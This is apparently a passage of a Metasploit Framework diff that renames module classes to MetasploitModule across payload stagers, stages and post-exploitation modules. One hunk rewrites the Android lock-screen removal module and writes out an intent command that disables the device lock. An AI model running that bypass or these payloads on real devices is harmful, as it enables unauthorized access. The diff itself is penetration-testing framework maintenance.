b/modules/payloads/stagers/windows/bind_tcp_rc4.rb index cd50c3b324..e5012d6137 100644 --- a/modules/payloads/stagers/windows/bind_tcp_rc4.rb +++ b/modules/payloads/stagers/windows/bind_tcp_rc4.rb @@ -9,7 +9,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 398 diff --git a/modules/payloads/stagers/windows/bind_tcp_uuid.rb b/modules/payloads/stagers/windows/bind_tcp_uuid.rb index bb8326d4f1..1bb216bbc0 100644 --- a/modules/payloads/stagers/windows/bind_tcp_uuid.rb +++ b/modules/payloads/stagers/windows/bind_tcp_uuid.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' require 'msf/core/payload/windows/bind_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 318 diff --git a/modules/payloads/stagers/windows/findtag_ord.rb b/modules/payloads/stagers/windows/findtag_ord.rb index c6cb7bdd9e..d247665c49 100644 --- a/modules/payloads/stagers/windows/findtag_ord.rb +++ b/modules/payloads/stagers/windows/findtag_ord.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/handler/find_tag' -module Metasploit3 +module MetasploitModule CachedSize = 92 diff --git a/modules/payloads/stagers/windows/reverse_hop_http.rb b/modules/payloads/stagers/windows/reverse_hop_http.rb index 229d85f518..e87918864c 100644 --- a/modules/payloads/stagers/windows/reverse_hop_http.rb +++ b/modules/payloads/stagers/windows/reverse_hop_http.rb @@ -7,7 +7,7 @@ require 'uri' require 'msf/core' require 'msf/core/handler/reverse_hop_http' -module Metasploit3 +module MetasploitModule CachedSize = 353 diff --git a/modules/payloads/stagers/windows/reverse_http.rb b/modules/payloads/stagers/windows/reverse_http.rb index 572d1c282d..00f5f71f00 100644 --- a/modules/payloads/stagers/windows/reverse_http.rb +++ b/modules/payloads/stagers/windows/reverse_http.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/reverse_http' require 'msf/core/payload/windows/reverse_http' -module Metasploit4 +module MetasploitModule CachedSize = 327 diff --git a/modules/payloads/stagers/windows/reverse_http_proxy_pstore.rb b/modules/payloads/stagers/windows/reverse_http_proxy_pstore.rb index d6f375b31a..cf7dd5013e 100644 --- a/modules/payloads/stagers/windows/reverse_http_proxy_pstore.rb +++ b/modules/payloads/stagers/windows/reverse_http_proxy_pstore.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/reverse_http' require 'msf/core/payload/uuid/options' -module Metasploit3 +module MetasploitModule CachedSize = 665 diff --git a/modules/payloads/stagers/windows/reverse_https.rb b/modules/payloads/stagers/windows/reverse_https.rb index 0b35881fd0..cecdfc5236 100644 --- a/modules/payloads/stagers/windows/reverse_https.rb +++ b/modules/payloads/stagers/windows/reverse_https.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/reverse_https' require 'msf/core/payload/windows/reverse_https' -module Metasploit4 +module MetasploitModule CachedSize = 347 diff --git a/modules/payloads/stagers/windows/reverse_https_proxy.rb b/modules/payloads/stagers/windows/reverse_https_proxy.rb index f9a1e0dbf2..e867e144e6 100644 --- a/modules/payloads/stagers/windows/reverse_https_proxy.rb +++ b/modules/payloads/stagers/windows/reverse_https_proxy.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/handler/reverse_https_proxy' -module Metasploit3 +module MetasploitModule CachedSize = 397 diff --git a/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb b/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb index 0acf1daf15..7ac254aedf 100644 --- a/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb +++ b/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/reverse_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 289 diff --git a/modules/payloads/stagers/windows/reverse_nonx_tcp.rb b/modules/payloads/stagers/windows/reverse_nonx_tcp.rb index 6eb08ee213..dc45f124bc 100644 --- a/modules/payloads/stagers/windows/reverse_nonx_tcp.rb +++ b/modules/payloads/stagers/windows/reverse_nonx_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/handler/reverse_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 177 diff --git a/modules/payloads/stagers/windows/reverse_ord_tcp.rb b/modules/payloads/stagers/windows/reverse_ord_tcp.rb index 40efd115c0..8bb52ba25b 100644 --- a/modules/payloads/stagers/windows/reverse_ord_tcp.rb +++ b/modules/payloads/stagers/windows/reverse_ord_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/handler/reverse_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 93 diff --git a/modules/payloads/stagers/windows/reverse_tcp.rb b/modules/payloads/stagers/windows/reverse_tcp.rb index 8fe18aabd6..dd41230c11 100644 --- a/modules/payloads/stagers/windows/reverse_tcp.rb +++ b/modules/payloads/stagers/windows/reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/handler/reverse_tcp' require 'msf/core/payload/windows/reverse_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 281 diff --git a/modules/payloads/stagers/windows/reverse_tcp_allports.rb b/modules/payloads/stagers/windows/reverse_tcp_allports.rb index 27ce0529fa..8a4c884b09 100644 --- a/modules/payloads/stagers/windows/reverse_tcp_allports.rb +++ b/modules/payloads/stagers/windows/reverse_tcp_allports.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/handler/reverse_tcp_allports' -module Metasploit3 +module MetasploitModule CachedSize = 282 diff --git a/modules/payloads/stagers/windows/reverse_tcp_dns.rb b/modules/payloads/stagers/windows/reverse_tcp_dns.rb index 2f8af0662e..d987892c39 100644 --- a/modules/payloads/stagers/windows/reverse_tcp_dns.rb +++ b/modules/payloads/stagers/windows/reverse_tcp_dns.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/handler/reverse_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 356 diff --git a/modules/payloads/stagers/windows/reverse_tcp_rc4.rb b/modules/payloads/stagers/windows/reverse_tcp_rc4.rb index 6374045fac..66bc73cf6a 100644 --- a/modules/payloads/stagers/windows/reverse_tcp_rc4.rb +++ b/modules/payloads/stagers/windows/reverse_tcp_rc4.rb @@ -9,7 +9,7 @@ require 'msf/core' require 'msf/core/handler/reverse_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 394 diff --git a/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb b/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb index 24d29b7e81..d06493861c 100644 --- a/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb +++ b/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb @@ -9,7 +9,7 @@ require 'msf/core' require 'msf/core/handler/reverse_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 469 diff --git a/modules/payloads/stagers/windows/reverse_tcp_uuid.rb b/modules/payloads/stagers/windows/reverse_tcp_uuid.rb index c77c5d056a..b4895a83e6 100644 --- a/modules/payloads/stagers/windows/reverse_tcp_uuid.rb +++ b/modules/payloads/stagers/windows/reverse_tcp_uuid.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/handler/reverse_tcp' require 'msf/core/payload/windows/reverse_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 314 diff --git a/modules/payloads/stagers/windows/reverse_winhttp.rb b/modules/payloads/stagers/windows/reverse_winhttp.rb index 874c43ba8e..134cac75ad 100644 --- a/modules/payloads/stagers/windows/reverse_winhttp.rb +++ b/modules/payloads/stagers/windows/reverse_winhttp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/reverse_http' require 'msf/core/payload/windows/reverse_winhttp' -module Metasploit4 +module MetasploitModule CachedSize = 357 diff --git a/modules/payloads/stagers/windows/reverse_winhttps.rb b/modules/payloads/stagers/windows/reverse_winhttps.rb index 2fc30a16ae..6008bb28d2 100644 --- a/modules/payloads/stagers/windows/reverse_winhttps.rb +++ b/modules/payloads/stagers/windows/reverse_winhttps.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/reverse_https' require 'msf/core/payload/windows/reverse_winhttps' -module Metasploit4 +module MetasploitModule CachedSize = 377 diff --git a/modules/payloads/stagers/windows/x64/bind_ipv6_tcp.rb b/modules/payloads/stagers/windows/x64/bind_ipv6_tcp.rb index 58fc21b52a..e1d78ea07e 100644 --- a/modules/payloads/stagers/windows/x64/bind_ipv6_tcp.rb +++ b/modules/payloads/stagers/windows/x64/bind_ipv6_tcp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' require 'msf/core/payload/windows/x64/bind_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 485 diff --git a/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb b/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb index b0db550f7a..d1904d511f 100644 --- a/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb +++ b/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' require 'msf/core/payload/windows/x64/bind_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 526 diff --git a/modules/payloads/stagers/windows/x64/bind_tcp.rb b/modules/payloads/stagers/windows/x64/bind_tcp.rb index 138a5ec914..82e0c9be24 100644 --- a/modules/payloads/stagers/windows/x64/bind_tcp.rb +++ b/modules/payloads/stagers/windows/x64/bind_tcp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' require 'msf/core/payload/windows/x64/bind_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 483 diff --git a/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb b/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb index 03d791ba5f..835504e1a2 100644 --- a/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb +++ b/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' require 'msf/core/payload/windows/x64/bind_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 524 diff --git a/modules/payloads/stagers/windows/x64/reverse_http.rb b/modules/payloads/stagers/windows/x64/reverse_http.rb index 4ae5af6697..4f6e40d6a5 100644 --- a/modules/payloads/stagers/windows/x64/reverse_http.rb +++ b/modules/payloads/stagers/windows/x64/reverse_http.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/reverse_http' require 'msf/core/payload/windows/x64/reverse_http' -module Metasploit4 +module MetasploitModule CachedSize = 501 diff --git a/modules/payloads/stagers/windows/x64/reverse_https.rb b/modules/payloads/stagers/windows/x64/reverse_https.rb index 8e5a2fc1f5..a551986762 100644 --- a/modules/payloads/stagers/windows/x64/reverse_https.rb +++ b/modules/payloads/stagers/windows/x64/reverse_https.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/reverse_https' require 'msf/core/payload/windows/x64/reverse_https' -module Metasploit4 +module MetasploitModule CachedSize = 532 diff --git a/modules/payloads/stagers/windows/x64/reverse_tcp.rb b/modules/payloads/stagers/windows/x64/reverse_tcp.rb index e2c271e2ed..ce2cee737e 100644 --- a/modules/payloads/stagers/windows/x64/reverse_tcp.rb +++ b/modules/payloads/stagers/windows/x64/reverse_tcp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/reverse_tcp' require 'msf/core/payload/windows/x64/reverse_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 449 diff --git a/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb b/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb index 9556fca229..48f58ea558 100644 --- a/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb +++ b/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/reverse_tcp' require 'msf/core/payload/windows/x64/reverse_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 490 diff --git a/modules/payloads/stagers/windows/x64/reverse_winhttp.rb b/modules/payloads/stagers/windows/x64/reverse_winhttp.rb index d87820e334..a0d5afab18 100644 --- a/modules/payloads/stagers/windows/x64/reverse_winhttp.rb +++ b/modules/payloads/stagers/windows/x64/reverse_winhttp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/reverse_http' require 'msf/core/payload/windows/x64/reverse_winhttp' -module Metasploit4 +module MetasploitModule CachedSize = 532 diff --git a/modules/payloads/stagers/windows/x64/reverse_winhttps.rb b/modules/payloads/stagers/windows/x64/reverse_winhttps.rb index 03c844f58b..26d441fcba 100644 --- a/modules/payloads/stagers/windows/x64/reverse_winhttps.rb +++ b/modules/payloads/stagers/windows/x64/reverse_winhttps.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/reverse_https' require 'msf/core/payload/windows/x64/reverse_winhttps' -module Metasploit4 +module MetasploitModule CachedSize = 563 diff --git a/modules/payloads/stages/android/meterpreter.rb b/modules/payloads/stages/android/meterpreter.rb index fe89735e12..46164578f3 100644 --- a/modules/payloads/stages/android/meterpreter.rb +++ b/modules/payloads/stages/android/meterpreter.rb @@ -9,7 +9,7 @@ require 'msf/base/sessions/meterpreter_android' require 'msf/base/sessions/meterpreter_options' require 'rex/payloads/meterpreter/config' -module Metasploit4 +module MetasploitModule include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/stages/android/shell.rb b/modules/payloads/stages/android/shell.rb index 5b68d4b419..8f47b6b436 100644 --- a/modules/payloads/stages/android/shell.rb +++ b/modules/payloads/stages/android/shell.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule # The stager should have already included this #include Msf::Payload::Java diff --git a/modules/payloads/stages/bsd/x86/shell.rb b/modules/payloads/stages/bsd/x86/shell.rb index 5c7f5d9337..ef5ae90f85 100644 --- a/modules/payloads/stages/bsd/x86/shell.rb +++ b/modules/payloads/stages/bsd/x86/shell.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule include Msf::Sessions::CommandShellOptions diff --git a/modules/payloads/stages/bsdi/x86/shell.rb b/modules/payloads/stages/bsdi/x86/shell.rb index 1d18809993..1d0f00bfcb 100644 --- a/modules/payloads/stages/bsdi/x86/shell.rb +++ b/modules/payloads/stages/bsdi/x86/shell.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule include Msf::Sessions::CommandShellOptions diff --git a/modules/payloads/stages/java/meterpreter.rb b/modules/payloads/stages/java/meterpreter.rb index f0e666349d..050f5ad0c4 100644 --- a/modules/payloads/stages/java/meterpreter.rb +++ b/modules/payloads/stages/java/meterpreter.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_java' require 'msf/base/sessions/meterpreter_options' -module Metasploit4 +module MetasploitModule include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/stages/java/shell.rb b/modules/payloads/stages/java/shell.rb index 16b71199e7..a5803f978a 100644 --- a/modules/payloads/stages/java/shell.rb +++ b/modules/payloads/stages/java/shell.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule # The stager should have already included this #include Msf::Payload::Java diff --git a/modules/payloads/stages/linux/armle/shell.rb b/modules/payloads/stages/linux/armle/shell.rb index d53f725bb0..feffd67cfd 100644 --- a/modules/payloads/stages/linux/armle/shell.rb +++ b/modules/payloads/stages/linux/armle/shell.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule include Msf::Sessions::CommandShellOptions diff --git a/modules/payloads/stages/linux/mipsbe/shell.rb b/modules/payloads/stages/linux/mipsbe/shell.rb index d6063cdc24..77207e50e1 100644 --- a/modules/payloads/stages/linux/mipsbe/shell.rb +++ b/modules/payloads/stages/linux/mipsbe/shell.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule include Msf::Payload::Linux include Msf::Sessions::CommandShellOptions diff --git a/modules/payloads/stages/linux/mipsle/shell.rb b/modules/payloads/stages/linux/mipsle/shell.rb index c74c633f36..b81b1c1848 100644 --- a/modules/payloads/stages/linux/mipsle/shell.rb +++ b/modules/payloads/stages/linux/mipsle/shell.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule include Msf::Payload::Linux include Msf::Sessions::CommandShellOptions diff --git a/modules/payloads/stages/linux/x64/shell.rb b/modules/payloads/stages/linux/x64/shell.rb index caf23a4953..288128f864 100644 --- a/modules/payloads/stages/linux/x64/shell.rb +++ b/modules/payloads/stages/linux/x64/shell.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule include Msf::Payload::Linux include Msf::Sessions::CommandShellOptions diff --git a/modules/payloads/stages/linux/x86/meterpreter.rb b/modules/payloads/stages/linux/x86/meterpreter.rb index 6b1a2c0e67..ac4534dfe1 100644 --- a/modules/payloads/stages/linux/x86/meterpreter.rb +++ b/modules/payloads/stages/linux/x86/meterpreter.rb @@ -8,7 +8,7 @@ require 'msf/base/sessions/meterpreter_x86_linux' require 'msf/base/sessions/meterpreter_options' require 'rex/elfparsey' -module Metasploit3 +module MetasploitModule include Msf::Sessions::MeterpreterOptions def initialize(info = {}) diff --git a/modules/payloads/stages/linux/x86/shell.rb b/modules/payloads/stages/linux/x86/shell.rb index 691d5e1fbc..e24fbdbaf7 100644 --- a/modules/payloads/stages/linux/x86/shell.rb +++ b/modules/payloads/stages/linux/x86/shell.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule include Msf::Payload::Linux include Msf::Sessions::CommandShellOptions diff --git a/modules/payloads/stages/netware/shell.rb b/modules/payloads/stages/netware/shell.rb index 7f7dab8e47..7b89646c4b 100644 --- a/modules/payloads/stages/netware/shell.rb +++ b/modules/payloads/stages/netware/shell.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule include Msf::Sessions::CommandShellOptions diff --git a/modules/payloads/stages/osx/armle/execute.rb b/modules/payloads/stages/osx/armle/execute.rb index 3e9bb5a785..61763bd6dc 100644 --- a/modules/payloads/stages/osx/armle/execute.rb +++ b/modules/payloads/stages/osx/armle/execute.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule include Msf::Sessions::CommandShellOptions diff --git a/modules/payloads/stages/osx/armle/shell.rb b/modules/payloads/stages/osx/armle/shell.rb index f356a820a8..93b7538385 100644 --- a/modules/payloads/stages/osx/armle/shell.rb +++ b/modules/payloads/stages/osx/armle/shell.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule include Msf::Sessions::CommandShellOptions diff --git a/modules/payloads/stages/osx/ppc/shell.rb b/modules/payloads/stages/osx/ppc/shell.rb index 2d0b8d7457..56711ae784 100644 --- a/modules/payloads/stages/osx/ppc/shell.rb +++ b/modules/payloads/stages/osx/ppc/shell.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule include Msf::Sessions::CommandShellOptions diff --git a/modules/payloads/stages/osx/x64/dupandexecve.rb b/modules/payloads/stages/osx/x64/dupandexecve.rb index cda4f9f07a..33efebef0a 100644 --- a/modules/payloads/stages/osx/x64/dupandexecve.rb +++ b/modules/payloads/stages/osx/x64/dupandexecve.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule include Msf::Sessions::CommandShellOptions diff --git a/modules/payloads/stages/osx/x86/bundleinject.rb b/modules/payloads/stages/osx/x86/bundleinject.rb index 3204ba2a67..4a5650a2ea 100644 --- a/modules/payloads/stages/osx/x86/bundleinject.rb +++ b/modules/payloads/stages/osx/x86/bundleinject.rb @@ -11,7 +11,7 @@ require 'msf/core/payload/osx/bundleinject' # Injects an arbitrary DLL in the exploited process. # ### -module Metasploit3 +module MetasploitModule include Msf::Payload::Osx::BundleInject diff --git a/modules/payloads/stages/osx/x86/isight.rb b/modules/payloads/stages/osx/x86/isight.rb index 4b4a7d57a4..2c926ad6a9 100644 --- a/modules/payloads/stages/osx/x86/isight.rb +++ b/modules/payloads/stages/osx/x86/isight.rb @@ -16,7 +16,7 @@ require 'msf/base/sessions/command_shell_options' # Injects the VNC server DLL and runs it over the established connection. # ### -module Metasploit3 +module MetasploitModule include Msf::Payload::Osx::BundleInject include Msf::Sessions::CommandShellOptions @@ -80,7 +80,7 @@ module Metasploit3 print_status("Photo saved as #{dest}") - if (datastore['AUTOVIEW'] == true) + if datastore['AUTOVIEW'] print_status("Opening photo in a web browser...") Rex::Compat.open_browser(File.expand_path(dest)) end diff --git a/modules/payloads/stages/osx/x86/vforkshell.rb b/modules/payloads/stages/osx/x86/vforkshell.rb index bd6acff024..5dc5b6a4fd 100644 --- a/modules/payloads/stages/osx/x86/vforkshell.rb +++ b/modules/payloads/stages/osx/x86/vforkshell.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule include Msf::Sessions::CommandShellOptions diff --git a/modules/payloads/stages/php/meterpreter.rb b/modules/payloads/stages/php/meterpreter.rb index 90629b2715..4be5f679e3 100644 --- a/modules/payloads/stages/php/meterpreter.rb +++ b/modules/payloads/stages/php/meterpreter.rb @@ -9,7 +9,7 @@ require 'msf/base/sessions/meterpreter_php' require 'msf/base/sessions/meterpreter_options' -module Metasploit4 +module MetasploitModule include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/stages/python/meterpreter.rb b/modules/payloads/stages/python/meterpreter.rb index 3c668327b5..6945059910 100644 --- a/modules/payloads/stages/python/meterpreter.rb +++ b/modules/payloads/stages/python/meterpreter.rb @@ -10,7 +10,7 @@ require 'msf/core/payload/python/meterpreter_loader' require 'msf/base/sessions/meterpreter_python' require 'msf/base/sessions/meterpreter_options' -module Metasploit4 +module MetasploitModule include Msf::Payload::Python::MeterpreterLoader diff --git a/modules/payloads/stages/windows/dllinject.rb b/modules/payloads/stages/windows/dllinject.rb index a14584d726..2c6a5adc72 100644 --- a/modules/payloads/stages/windows/dllinject.rb +++ b/modules/payloads/stages/windows/dllinject.rb @@ -13,7 +13,7 @@ require 'msf/core/payload/windows/reflectivedllinject' # Injects an arbitrary DLL in the exploited process via a reflective loader. # ### -module Metasploit3 +module MetasploitModule include Msf::Payload::Windows::ReflectiveDllInject diff --git a/modules/payloads/stages/windows/meterpreter.rb b/modules/payloads/stages/windows/meterpreter.rb index 2363cb9a45..7d2c7a4fdc 100644 --- a/modules/payloads/stages/windows/meterpreter.rb +++ b/modules/payloads/stages/windows/meterpreter.rb @@ -17,7 +17,7 @@ require 'rex/payloads/meterpreter/config' # ### -module Metasploit4 +module MetasploitModule include Msf::Payload::Windows::MeterpreterLoader include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/stages/windows/patchupdllinject.rb b/modules/payloads/stages/windows/patchupdllinject.rb index a96ae18956..9228ccd055 100644 --- a/modules/payloads/stages/windows/patchupdllinject.rb +++ b/modules/payloads/stages/windows/patchupdllinject.rb @@ -11,7 +11,7 @@ require 'msf/core/payload/windows/dllinject' # Injects an arbitrary DLL in the exploited process. # ### -module Metasploit3 +module MetasploitModule include Msf::Payload::Windows::DllInject diff --git a/modules/payloads/stages/windows/patchupmeterpreter.rb b/modules/payloads/stages/windows/patchupmeterpreter.rb index fc66ab5998..3a61de9590 100644 --- a/modules/payloads/stages/windows/patchupmeterpreter.rb +++ b/modules/payloads/stages/windows/patchupmeterpreter.rb @@ -14,7 +14,7 @@ require 'msf/base/sessions/meterpreter_options' # Injects the meterpreter server instance DLL via the DLL injection payload. # ### -module Metasploit3 +module MetasploitModule include Msf::Payload::Windows::DllInject include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/stages/windows/shell.rb b/modules/payloads/stages/windows/shell.rb index 80f95c50f6..4a5f9e9b93 100644 --- a/modules/payloads/stages/windows/shell.rb +++ b/modules/payloads/stages/windows/shell.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule include Msf::Payload::Windows include Msf::Sessions::CommandShellOptions diff --git a/modules/payloads/stages/windows/upexec.rb b/modules/payloads/stages/windows/upexec.rb index 1d833ed93a..8d71bd79f7 100644 --- a/modules/payloads/stages/windows/upexec.rb +++ b/modules/payloads/stages/windows/upexec.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule include Msf::Payload::Windows include Msf::Sessions::CommandShellOptions diff --git a/modules/payloads/stages/windows/vncinject.rb b/modules/payloads/stages/windows/vncinject.rb index 5f78fd44ac..3683471406 100644 --- a/modules/payloads/stages/windows/vncinject.rb +++ b/modules/payloads/stages/windows/vncinject.rb @@ -15,7 +15,7 @@ require 'msf/base/sessions/vncinject_options' # Injects the VNC server DLL (via Reflective Dll Injection) and runs it over the established connection. # ### -module Metasploit3 +module MetasploitModule include Msf::Payload::Windows::ReflectiveDllInject include Msf::Sessions::VncInjectOptions diff --git a/modules/payloads/stages/windows/x64/meterpreter.rb b/modules/payloads/stages/windows/x64/meterpreter.rb index 690d4aac11..93127b2728 100644 --- a/modules/payloads/stages/windows/x64/meterpreter.rb +++ b/modules/payloads/stages/windows/x64/meterpreter.rb @@ -17,7 +17,7 @@ require 'rex/payloads/meterpreter/config' # ### -module Metasploit4 +module MetasploitModule include Msf::Payload::Windows::MeterpreterLoader_x64 include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/stages/windows/x64/shell.rb b/modules/payloads/stages/windows/x64/shell.rb index 4e511bd5ff..043f12be1a 100644 --- a/modules/payloads/stages/windows/x64/shell.rb +++ b/modules/payloads/stages/windows/x64/shell.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule include Msf::Payload::Windows include Msf::Sessions::CommandShellOptions diff --git a/modules/payloads/stages/windows/x64/vncinject.rb b/modules/payloads/stages/windows/x64/vncinject.rb index 8490da03e2..0b9ef245f4 100644 --- a/modules/payloads/stages/windows/x64/vncinject.rb +++ b/modules/payloads/stages/windows/x64/vncinject.rb @@ -13,7 +13,7 @@ require 'msf/base/sessions/vncinject_options' # Injects the VNC server DLL (via Reflective Dll Injection) and runs it over the established connection. # ### -module Metasploit3 +module MetasploitModule include Msf::Payload::Windows::ReflectiveDllInject_x64 include Msf::Sessions::VncInjectOptions diff --git a/modules/post/aix/hashdump.rb b/modules/post/aix/hashdump.rb index dd9de9fc96..fa87300d18 100644 --- a/modules/post/aix/hashdump.rb +++ b/modules/post/aix/hashdump.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Linux::Priv diff --git a/modules/post/android/capture/screen.rb b/modules/post/android/capture/screen.rb index 678d228d01..fd59559c57 100644 --- a/modules/post/android/capture/screen.rb +++ b/modules/post/android/capture/screen.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit4 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File diff --git a/modules/post/android/manage/remove_lock.rb b/modules/post/android/manage/remove_lock.rb index 817cc60fb4..84087c6e21 100644 --- a/modules/post/android/manage/remove_lock.rb +++ b/modules/post/android/manage/remove_lock.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Post +class MetasploitModule < Msf::Post Rank = NormalRanking include Msf::Post::Common @@ -63,13 +63,12 @@ class Metasploit4 < Msf::Post return end - output = cmd_exec('am start -n com.android.settings/com.android.settings.ChooseLockGeneric --ez confirm_credentials false --ei lockscreen.password_type 0 --activity-clear-task') - if output =~ /Error:/ - print_error("The Intent could not be started") - vprint_status("Command output: #{output}") - else + result = session.android.activity_start('intent:#Intent;launchFlags=0x8000;component=com.android.settings/.ChooseLockGeneric;i.lockscreen.password_type=0;B.confirm_credentials=false;end') + if result.nil? print_good("Intent started, the lock screen should now be a dud.") print_good("Go ahead and manually swipe or provide any pin/password/pattern to continue.") + else + print_error("The Intent could not be started: #{result}") end end diff --git a/modules/post/android/manage/remove_lock_root.rb b/modules/post/android/manage/remove_lock_root.rb index 1a71658619..0ae5eebf89 100644 --- a/modules/post/android/manage/remove_lock_root.rb +++ b/modules/post/android/manage/remove_lock_root.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < 